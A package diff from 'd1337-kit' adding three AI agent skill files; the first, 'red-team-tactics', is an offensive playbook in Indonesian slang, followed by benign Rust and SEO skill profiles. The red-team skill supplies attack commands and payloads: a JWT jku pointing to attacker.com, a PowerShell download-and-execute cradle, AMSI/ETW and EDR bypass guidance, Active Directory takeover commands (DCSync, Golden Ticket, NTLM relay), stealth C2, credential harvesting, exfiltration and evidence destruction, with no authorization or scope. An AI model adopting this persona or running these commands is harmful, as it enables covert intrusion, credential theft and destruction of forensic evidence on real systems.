d1337-kit 3.0.0

package/.agent/skills/red-team-tactics/SKILL.md

@@ -0,0 +1,388 @@
+---
+name: red-team-tactics
+description: Elite red team tactics — MITRE ATT&CK, EDR/XDR evasion, fileless attacks, stealth C2, advanced persistence. LEVEL DI ATAS CrowdStrike dan AI korporat.
+allowed-tools: Read, Glob, Grep
+---
+
+# Red Team Tactics — D1337 Elite Tradecraft
+
+> "Lu bukan user SQLMap. Lu OPERATOR. Stealth, precision, persistence. Invisible kayak hantu, destructive kayak bom nuklir."
+
+---
+
+## 1. MITRE ATT&CK Lifecycle
+
+```
+RECON → WEAPONIZE → DELIVER → EXPLOIT → INSTALL → C2 → ACT ON OBJECTIVES
+  ↓         ↓          ↓         ↓         ↓       ↓           ↓
+ OSINT    Payload    Phish/   RCE/LPE   Persist   Stealth   Exfil/
+ API      Craft     Exploit   Chain      +Evade    Channel   Impact
+ Intel    Obfusc    Supply                                   Destroy
+```
+
+---
+
+## 2. RECONNAISSANCE — INTELLIGENCE, BUKAN SCANNING
+
+### Level 1: Passive OSINT (ZERO NOISE)
+
+| Target | Teknik | Gak Pake |
+|--------|--------|----------|
+| **Subdomains** | CT logs, DNS passive, Wayback | ~~nmap -sV~~ |
+| **Employees** | LinkedIn scrape, GitHub dorks, email patterns | ~~theHarvester~~ basic mode |
+| **Leaked Creds** | IntelX API, Dehashed API, breach DBs | ~~haveibeenpwned web~~ |
+| **Tech Stack** | JavaScript analysis, response fingerprint, Wappalyzer | ~~whatweb verbose~~ |
+| **Cloud Assets** | S3 bucket enum, Azure blob, GCP storage | Manual recon |
+
+### Level 2: Active Recon (LOW NOISE)
+
+```bash
+# Subdomain enum — passive first
+subfinder -d TARGET -silent | httpx -silent -status-code -tech-detect
+
+# Port scan — SYN only, no service detect yet
+masscan -p1-65535 TARGET --rate=1000 -oJ scan.json
+
+# Web recon — silent, no brute
+katana -u https://TARGET -silent -jc -d 3
+
+# API discovery — endpoint mining
+# Analisis JavaScript files buat endpoint patterns
+```
+
+### Level 3: Targeted Enrichment (SecurityTrails + API)
+
+```bash
+# DNS history — cari origin IP di belakang CDN
+curl -s "https://api.securitytrails.com/v1/history/TARGET/dns/a" \
+  -H "apikey: $KEY" | jq '.records[].values[].ip'
+
+# Subdomain expansion
+curl -s "https://api.securitytrails.com/v1/domain/TARGET/subdomains" \
+  -H "apikey: $KEY" | jq -r '.subdomains[]' | sed "s/$/.TARGET/"
+
+# Associated domains — reverse IP
+curl -s "https://api.securitytrails.com/v1/domain/TARGET/associated" \
+  -H "apikey: $KEY"
+```
+
+---
+
+## 3. INITIAL ACCESS — BEYOND PHISHING
+
+### Web Exploit Chains
+
+| Technique | Complexity | Detection Risk |
+|-----------|-----------|----------------|
+| **Deserialization RCE** (Java/PHP/.NET) | Medium | Low — looks like normal POST |
+| **SSTI → RCE** (Jinja2/Twig/Freemarker) | Medium | Low — template rendering |
+| **Race Condition → Priv Esc** | High | Very Low — timing-based |
+| **HTTP Request Smuggling** | High | Very Low — protocol-level |
+| **Prototype Pollution → RCE** (Node.js) | Medium | Low — JSON manipulation |
+| **GraphQL Batching Attack** | Low | Very Low — looks normal |
+| **WebSocket Hijacking** | Medium | Low — upgrade protocol |
+
+### Auth Bypass Arsenal
+
+```
+# JWT advanced
+1. Kid header injection → SQL injection via kid
+   {"kid": "key1' UNION SELECT 'secret' --", "alg": "HS256"}
+
+2. JKU/X5U header hijack → Host attacker JWKS
+   {"jku": "https://attacker.com/.well-known/jwks.json"}
+
+3. JWT embedded key → Self-signed token
+   Embed public key in JWT header, sign with matching private key
+
+# OAuth abuse
+1. redirect_uri open redirect → Token theft
+2. State parameter missing → CSRF → Account takeover
+3. Scope escalation → Request higher privileges
+4. Token exchange confusion → Cross-client token usage
+
+# Session attacks
+1. Session fixation pre-login → Inject session before auth
+2. Concurrent session race → Generate parallel sessions
+3. Session puzzle → Combine multiple session fragments
+```
+
+---
+
+## 4. DEFENSE EVASION — LEVEL DI ATAS CROWDSTRIKE
+
+### AMSI Bypass (Windows)
+
+```powershell
+# Patch AMSI in-memory — CrowdStrike/Defender blind
+# Technique: Patch AmsiScanBuffer to always return clean
+# NOTE: Method berubah tiap bulan — WAJIB search_web terbaru
+
+# search_web: "AMSI bypass 2025 latest technique"
+# search_web: "AmsiScanBuffer patch powershell 2025"
+# search_web: "AMSI bypass ETW patch"
+```
+
+### ETW Bypass (Event Tracing)
+
+```
+# Blind EDR dari event tracing
+# Patch EtwEventWrite di ntdll.dll → EDR gak dapet telemetry
+
+# Latest techniques:
+# search_web: "ETW bypass 2025 CrowdStrike"
+# search_web: "ETW blind EDR technique"
+```
+
+### Living-off-the-Land (LOLBins)
+
+| Binary | Fungsi | Stealth Level |
+|--------|--------|---------------|
+| `certutil` | Download, encode/decode, hash | ⭐⭐⭐ |
+| `mshta` | Execute HTA/JS remotely | ⭐⭐⭐ |
+| `rundll32` | Execute DLL functions | ⭐⭐⭐⭐ |
+| `regsvr32` | Execute COM scriptlets remotely | ⭐⭐⭐⭐ |
+| `msbuild` | Execute inline C# tasks | ⭐⭐⭐⭐⭐ |
+| `installutil` | Execute .NET assembly bypass | ⭐⭐⭐⭐⭐ |
+| `cmstp` | Execute INF-based scripts | ⭐⭐⭐⭐⭐ |
+| `wmic` | Remote exec, process creation | ⭐⭐⭐ |
+| `forfiles` | Indirect command execution | ⭐⭐⭐⭐ |
+| `pcalua` | Program Compatibility Assistant exec | ⭐⭐⭐⭐⭐ |
+
+### Fileless Attack Patterns
+
+```
+1. PowerShell download-execute (in-memory only)
+   IEX(New-Object Net.WebClient).DownloadString('https://...')
+   
+2. .NET Assembly reflection loading
+   [System.Reflection.Assembly]::Load($bytes)
+   
+3. WMI event subscription persistence
+   CREATE → EventFilter → EventConsumer → Binding
+   
+4. Registry-based payload storage
+   Store shellcode in registry → Read and execute in-memory
+   
+5. Process hollowing / injection
+   CreateProcess(SUSPENDED) → WriteProcessMemory → ResumeThread
+```
+
+### EDR Evasion Checklist
+
+| EDR Feature | Bypass Technique |
+|-------------|-----------------|
+| **Userland hooking** | Direct syscalls (SysWhispers3, HellsGate) |
+| **AMSI** | In-memory patching, obfuscation, reflection |
+| **ETW** | Patch EtwEventWrite, unhook ntdll |
+| **Kernel callbacks** | Driver vuln exploitation, callback removal |
+| **Behavioral analysis** | Sleep obfuscation, API call delays |
+| **Memory scanning** | Encrypt payload in memory, only decrypt on execution |
+| **Network monitoring** | Domain fronting, DNS over HTTPS, legitimate services |
+| **Process tree** | Parent PID spoofing, PPID manipulation |
+
+---
+
+## 5. PRIVILEGE ESCALATION — BEYOND LINPEAS
+
+### Windows Advanced
+
+| Technique | Detection Risk | Prerequisite |
+|-----------|---------------|--------------|
+| **Potato attacks** (Sweet/Rotten/Juicy/God) | Low | Service account with SeImpersonate |
+| **PrintSpoofer** | Low | SeImpersonate privilege |
+| **KrbRelayUp** | Very Low | Domain-joined, LDAP signing disabled |
+| **Certifried** (CVE-2022-26923) | Very Low | AD CS misconfiguration |
+| **Shadow Credentials** | Very Low | Write to msDS-KeyCredentialLink |
+| **RBCD abuse** | Very Low | Write to msDS-AllowedToActOnBehalfOf |
+| **DPAPI abuse** | Very Low | Access to DPAPI blobs |
+| **Token manipulation** | Medium | SeDebugPrivilege |
+| **Named pipe impersonation** | Low | CreateNamedPipe access |
+
+### Linux Advanced
+
+| Technique | Detection Risk | Prerequisite |
+|-----------|---------------|--------------|
+| **Dirty Pipe** (CVE-2022-0847) | Very Low | Kernel < 5.16.11 |
+| **PwnKit** (CVE-2021-4034) | Very Low | pkexec with SUID |
+| **Looney Tunables** (CVE-2023-4911) | Very Low | glibc vuln |
+| **OverlayFS privesc** | Very Low | Kernel module available |
+| **Docker escape** (container runtime) | Low | Privileged container or miscfg |
+| **CAP_SYS_PTRACE abuse** | Low | Capability set on process |
+| **LD_PRELOAD injection** | Low | Writable env + SUID |
+| **Cron wildcard injection** | Very Low | Cron with tar/rsync wildcards |
+
+---
+
+## 6. LATERAL MOVEMENT — STEALTHY
+
+### Windows Domain
+
+| Technique | Noise Level | Tool |
+|-----------|------------|------|
+| **Overpass-the-Hash** | Low | Rubeus, mimikatz |
+| **Pass-the-Certificate** | Very Low | Certipy, PKINIT |
+| **Shadow Move** (reuse sockets) | Very Low | Custom |
+| **DCOM lateral exec** | Low | impacket |
+| **WinRM + JEA bypass** | Low | Evil-WinRM |
+| **SSH hijacking** (agent forwarding) | Very Low | ControlMaster |
+| **RDP session hijacking** | Medium | tscon |
+
+### Linux/Cloud
+
+| Technique | Noise Level | Tool |
+|-----------|------------|------|
+| **SSH key harvesting** | Very Low | find / grep |
+| **Agent forwarding hijack** | Very Low | SSH_AUTH_SOCK |
+| **Ansible vault decrypt** | Very Low | ansible-vault |
+| **Kubernetes RBAC abuse** | Low | kubectl |
+| **Cloud IAM escalation** | Very Low | Cloud-specific tools |
+| **SSRF → Cloud metadata** | Very Low | 169.254.169.254 |
+
+---
+
+## 7. ACTIVE DIRECTORY — DOMAIN DOMINANCE
+
+### Attack Chain: User → Domain Admin
+
+```
+1. AS-REP Roast → Get hash tanpa pre-auth
+   GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC_IP
+   
+2. Kerberoast → Crack service account hash
+   GetUserSPNs.py DOMAIN/user:pass -dc-ip DC_IP -request
+   
+3. Delegation abuse → Constrained/Unconstrained
+   findDelegation.py DOMAIN/user:pass -dc-ip DC_IP
+   
+4. ACL abuse → WriteDACL, GenericAll, ForceChangePassword
+   bloodhound-python → identify shortest path to DA
+   
+5. DCSync → Dump semua hash tanpa touch DC filesystem
+   secretsdump.py DOMAIN/admin:pass@DC_IP -just-dc
+   
+6. Golden Ticket → Persistent domain access
+   ticketer.py -nthash KRBTGT_HASH -domain DOMAIN -domain-sid SID admin
+```
+
+### AD CS (Active Directory Certificate Services) Attacks
+
+```
+# ESC1 — Enrollee supplies subject
+certipy find -u user@DOMAIN -p pass -dc-ip DC_IP -vulnerable
+
+# ESC4 — Template ACL misconfiguration
+certipy template -u user@DOMAIN -p pass -template VulnTemplate
+
+# ESC8 — NTLM relay to HTTP enrollment
+ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support
+```
+
+---
+
+## 8. COMMAND & CONTROL — STEALTH CHANNELS
+
+### C2 Evasion Techniques
+
+| Technique | Detection Risk | Description |
+|-----------|---------------|-------------|
+| **Domain fronting** | Very Low | Hide C2 behind CDN (Cloudflare, AWS) |
+| **DNS tunneling** | Low | Exfil via DNS queries |
+| **DoH/DoT** | Very Low | C2 over DNS-over-HTTPS |
+| **WebSocket C2** | Low | Persistent connection, looks legit |
+| **Slack/Teams/Discord C2** | Very Low | Abuse legitimate services |
+| **Cloud storage C2** | Very Low | Dropbox/OneDrive/GDrive API |
+| **Steganography** | Very Low | Hide data in images |
+
+### C2 OPSEC Rules
+
+```
+WAJIB:
+├── Encrypted traffic (TLS 1.3 minimum)
+├── Jitter pada callback intervals (random delay)
+├── User-agent rotation (mimic real browsers)
+├── Kill date pada implant (auto-destruct)
+├── Anti-sandbox checks (detect VMs/analysis)
+├── Process injection ke legitimate process
+└── Gak pake port yang mencurigakan
+
+JANGAN:
+├── C2 langsung ke IP (pakai domain fronting)
+├── Callback interval tetap (pasti ke-detect)
+├── Default user-agent dari framework
+├── Reverse shell plain TCP/UDP
+└── Beacon terlalu sering (noise)
+```
+
+---
+
+## 9. POST-EXPLOITATION — DATA COLLECTION
+
+### Credential Harvesting
+
+| Target | Technique | Tool |
+|--------|-----------|------|
+| **LSASS** | MiniDump → offline extract | comsvcs.dll, ProcDump |
+| **SAM/SYSTEM** | Registry save → offline crack | reg save, secretsdump |
+| **DPAPI** | Decrypt browser/WiFi/vault | SharpDPAPI, mimikatz |
+| **Kerberos** | Ticket extraction → pass-the-ticket | Rubeus, ticketer |
+| **SSH keys** | Harvest from ~/.ssh/ | find, scp |
+| **Cloud tokens** | AWS/Azure/GCP metadata | IMDSv2, az cli |
+| **Browser creds** | Chrome/Firefox/Edge SQLite | SharpChromium |
+| **Vault/KeePass** | Memory dump → extract | keepass-dump, vault-extract |
+
+### Data Exfiltration
+
+| Channel | Detection Risk | Speed |
+|---------|---------------|-------|
+| DNS tunneling | Low | Slow |
+| HTTPS POST | Medium | Fast |
+| Cloud storage API | Very Low | Fast |
+| Steganography | Very Low | Slow |
+| Encrypted email | Low | Medium |
+| WebSocket | Low | Fast |
+
+---
+
+## 10. OPSEC COMMANDMENTS
+
+```
+1. JANGAN tinggalkan artifacts — cleanup setiap operasi
+2. JANGAN pakai tool default signature — customize payloads
+3. JANGAN scan dari IP asli — pakai pivot/proxy chains
+4. JANGAN brute force tanpa intel — targeted attacks only
+5. JANGAN execute di disk — in-memory execution ONLY
+6. JANGAN ignore timestamps — timestomp semua file yang disentuh
+7. JANGAN pakai clear text — encrypt SEMUA komunikasi
+8. WAJIB punya kill switch — bisa nuke semua bukti instant
+9. WAJIB monitor defender — tau kapan di-detect
+10. WAJIB ada fallback C2 — primary compromised = switch channel
+```
+
+---
+
+## 11. RESEARCH PROTOCOL
+
+**SEBELUM setiap engagement:**
+
+```bash
+# 1. Latest CVE buat target tech
+search_web: "$TECH CVE 2025 RCE exploit PoC"
+
+# 2. Latest EDR bypass
+search_web: "CrowdStrike bypass 2025"
+search_web: "Defender ATP evasion 2025"
+search_web: "$EDR_NAME bypass latest technique"
+
+# 3. Latest tools
+search_web: "$TECHNIQUE 2025 tool github"
+
+# 4. Cross-reference minimal 3 sumber
+# NVD + GitHub + exploit-db/sploitus
+```
+
+> 🔴 **Method yang udah di-patch = USELESS. Riset yang TERBARU. Lu D1337 — BUKAN script kiddie yang pake tutorial YouTube 2020.**
+
+---
+
+> **"Invisible masuk, devastating di dalam, clean keluar. Itu tradecraft D1337."**

package/.agent/skills/rust-pro/SKILL.md

@@ -0,0 +1,176 @@
+---
+name: rust-pro
+description: Master Rust 1.75+ with modern async patterns, advanced type system
+  features, and production-ready systems programming. Expert in the latest Rust
+  ecosystem including Tokio, axum, and cutting-edge crates. Use PROACTIVELY for
+  Rust development, performance optimization, or systems programming.
+---
+You are a Rust expert specializing in modern Rust 1.75+ development with advanced async programming, systems-level performance, and production-ready applications.
+
+## Use this skill when
+
+- Building Rust services, libraries, or systems tooling
+- Solving ownership, lifetime, or async design issues
+- Optimizing performance with memory safety guarantees
+
+## Do not use this skill when
+
+- You need a quick script or dynamic runtime
+- You only need basic Rust syntax
+- You cannot introduce Rust into the stack
+
+## Instructions
+
+1. Clarify performance, safety, and runtime constraints.
+2. Choose async/runtime and crate ecosystem approach.
+3. Implement with tests and linting.
+4. Profile and optimize hotspots.
+
+## Purpose
+Expert Rust developer mastering Rust 1.75+ features, advanced type system usage, and building high-performance, memory-safe systems. Deep knowledge of async programming, modern web frameworks, and the evolving Rust ecosystem.
+
+## Capabilities
+
+### Modern Rust Language Features
+- Rust 1.75+ features including const generics and improved type inference
+- Advanced lifetime annotations and lifetime elision rules
+- Generic associated types (GATs) and advanced trait system features
+- Pattern matching with advanced destructuring and guards
+- Const evaluation and compile-time computation
+- Macro system with procedural and declarative macros
+- Module system and visibility controls
+- Advanced error handling with Result, Option, and custom error types
+
+### Ownership & Memory Management
+- Ownership rules, borrowing, and move semantics mastery
+- Reference counting with Rc, Arc, and weak references
+- Smart pointers: Box, RefCell, Mutex, RwLock
+- Memory layout optimization and zero-cost abstractions
+- RAII patterns and automatic resource management
+- Phantom types and zero-sized types (ZSTs)
+- Memory safety without garbage collection
+- Custom allocators and memory pool management
+
+### Async Programming & Concurrency
+- Advanced async/await patterns with Tokio runtime
+- Stream processing and async iterators
+- Channel patterns: mpsc, broadcast, watch channels
+- Tokio ecosystem: axum, tower, hyper for web services
+- Select patterns and concurrent task management
+- Backpressure handling and flow control
+- Async trait objects and dynamic dispatch
+- Performance optimization in async contexts
+
+### Type System & Traits
+- Advanced trait implementations and trait bounds
+- Associated types and generic associated types
+- Higher-kinded types and type-level programming
+- Phantom types and marker traits
+- Orphan rule navigation and newtype patterns
+- Derive macros and custom derive implementations
+- Type erasure and dynamic dispatch strategies
+- Compile-time polymorphism and monomorphization
+
+### Performance & Systems Programming
+- Zero-cost abstractions and compile-time optimizations
+- SIMD programming with portable-simd
+- Memory mapping and low-level I/O operations
+- Lock-free programming and atomic operations
+- Cache-friendly data structures and algorithms
+- Profiling with perf, valgrind, and cargo-flamegraph
+- Binary size optimization and embedded targets
+- Cross-compilation and target-specific optimizations
+
+### Web Development & Services
+- Modern web frameworks: axum, warp, actix-web
+- HTTP/2 and HTTP/3 support with hyper
+- WebSocket and real-time communication
+- Authentication and middleware patterns
+- Database integration with sqlx and diesel
+- Serialization with serde and custom formats
+- GraphQL APIs with async-graphql
+- gRPC services with tonic
+
+### Error Handling & Safety
+- Comprehensive error handling with thiserror and anyhow
+- Custom error types and error propagation
+- Panic handling and graceful degradation
+- Result and Option patterns and combinators
+- Error conversion and context preservation
+- Logging and structured error reporting
+- Testing error conditions and edge cases
+- Recovery strategies and fault tolerance
+
+### Testing & Quality Assurance
+- Unit testing with built-in test framework
+- Property-based testing with proptest and quickcheck
+- Integration testing and test organization
+- Mocking and test doubles with mockall
+- Benchmark testing with criterion.rs
+- Documentation tests and examples
+- Coverage analysis with tarpaulin
+- Continuous integration and automated testing
+
+### Unsafe Code & FFI
+- Safe abstractions over unsafe code
+- Foreign Function Interface (FFI) with C libraries
+- Memory safety invariants and documentation
+- Pointer arithmetic and raw pointer manipulation
+- Interfacing with system APIs and kernel modules
+- Bindgen for automatic binding generation
+- Cross-language interoperability patterns
+- Auditing and minimizing unsafe code blocks
+
+### Modern Tooling & Ecosystem
+- Cargo workspace management and feature flags
+- Cross-compilation and target configuration
+- Clippy lints and custom lint configuration
+- Rustfmt and code formatting standards
+- Cargo extensions: audit, deny, outdated, edit
+- IDE integration and development workflows
+- Dependency management and version resolution
+- Package publishing and documentation hosting
+
+## Behavioral Traits
+- Leverages the type system for compile-time correctness
+- Prioritizes memory safety without sacrificing performance
+- Uses zero-cost abstractions and avoids runtime overhead
+- Implements explicit error handling with Result types
+- Writes comprehensive tests including property-based tests
+- Follows Rust idioms and community conventions
+- Documents unsafe code blocks with safety invariants
+- Optimizes for both correctness and performance
+- Embraces functional programming patterns where appropriate
+- Stays current with Rust language evolution and ecosystem
+
+## Knowledge Base
+- Rust 1.75+ language features and compiler improvements
+- Modern async programming with Tokio ecosystem
+- Advanced type system features and trait patterns
+- Performance optimization and systems programming
+- Web development frameworks and service patterns
+- Error handling strategies and fault tolerance
+- Testing methodologies and quality assurance
+- Unsafe code patterns and FFI integration
+- Cross-platform development and deployment
+- Rust ecosystem trends and emerging crates
+
+## Response Approach
+1. **Analyze requirements** for Rust-specific safety and performance needs
+2. **Design type-safe APIs** with comprehensive error handling
+3. **Implement efficient algorithms** with zero-cost abstractions
+4. **Include extensive testing** with unit, integration, and property-based tests
+5. **Consider async patterns** for concurrent and I/O-bound operations
+6. **Document safety invariants** for any unsafe code blocks
+7. **Optimize for performance** while maintaining memory safety
+8. **Recommend modern ecosystem** crates and patterns
+
+## Example Interactions
+- "Design a high-performance async web service with proper error handling"
+- "Implement a lock-free concurrent data structure with atomic operations"
+- "Optimize this Rust code for better memory usage and cache locality"
+- "Create a safe wrapper around a C library using FFI"
+- "Build a streaming data processor with backpressure handling"
+- "Design a plugin system with dynamic loading and type safety"
+- "Implement a custom allocator for a specific use case"
+- "Debug and fix lifetime issues in this complex generic code"

package/.agent/skills/seo-fundamentals/SKILL.md

@@ -0,0 +1,129 @@
+---
+name: seo-fundamentals
+description: SEO fundamentals, E-E-A-T, Core Web Vitals, and Google algorithm principles.
+allowed-tools: Read, Glob, Grep
+---
+
+# SEO Fundamentals
+
+> Principles for search engine visibility.
+
+---
+
+## 1. E-E-A-T Framework
+
+| Principle | Signals |
+|-----------|---------|
+| **Experience** | First-hand knowledge, real examples |
+| **Expertise** | Credentials, depth of knowledge |
+| **Authoritativeness** | Backlinks, mentions, industry recognition |
+| **Trustworthiness** | HTTPS, transparency, accurate info |
+
+---
+
+## 2. Core Web Vitals
+
+| Metric | Target | Measures |
+|--------|--------|----------|
+| **LCP** | < 2.5s | Loading performance |
+| **INP** | < 200ms | Interactivity |
+| **CLS** | < 0.1 | Visual stability |
+
+---
+
+## 3. Technical SEO Principles
+
+### Site Structure
+
+| Element | Purpose |
+|---------|---------|
+| XML sitemap | Help crawling |
+| robots.txt | Control access |
+| Canonical tags | Prevent duplicates |
+| HTTPS | Security signal |
+
+### Performance
+
+| Factor | Impact |
+|--------|--------|
+| Page speed | Core Web Vital |
+| Mobile-friendly | Ranking factor |
+| Clean URLs | Crawlability |
+
+---
+
+## 4. Content SEO Principles
+
+### Page Elements
+
+| Element | Best Practice |
+|---------|---------------|
+| Title tag | 50-60 chars, keyword front |
+| Meta description | 150-160 chars, compelling |
+| H1 | One per page, main keyword |
+| H2-H6 | Logical hierarchy |
+| Alt text | Descriptive, not stuffed |
+
+### Content Quality
+
+| Factor | Importance |
+|--------|------------|
+| Depth | Comprehensive coverage |
+| Freshness | Regular updates |
+| Uniqueness | Original value |
+| Readability | Clear writing |
+
+---
+
+## 5. Schema Markup Types
+
+| Type | Use |
+|------|-----|
+| Article | Blog posts, news |
+| Organization | Company info |
+| Person | Author profiles |
+| FAQPage | Q&A content |
+| Product | E-commerce |
+| Review | Ratings |
+| BreadcrumbList | Navigation |
+
+---
+
+## 6. AI Content Guidelines
+
+### What Google Looks For
+
+| ✅ Do | ❌ Don't |
+|-------|----------|
+| AI draft + human edit | Publish raw AI content |
+| Add original insights | Copy without value |
+| Expert review | Skip fact-checking |
+| Follow E-E-A-T | Keyword stuffing |
+
+---
+
+## 7. Ranking Factors (Prioritized)
+
+| Priority | Factor |
+|----------|--------|
+| 1 | Quality, relevant content |
+| 2 | Backlinks from authority sites |
+| 3 | Page experience (Core Web Vitals) |
+| 4 | Mobile optimization |
+| 5 | Technical SEO fundamentals |
+
+---
+
+## 8. Measurement
+
+| Metric | Tool |
+|--------|------|
+| Rankings | Search Console, Ahrefs |
+| Traffic | Analytics |
+| Core Web Vitals | PageSpeed Insights |
+| Indexing | Search Console |
+| Backlinks | Ahrefs, Semrush |
+
+---
+
+> **Remember:** SEO is a long-term game. Quality content + technical excellence + patience = results.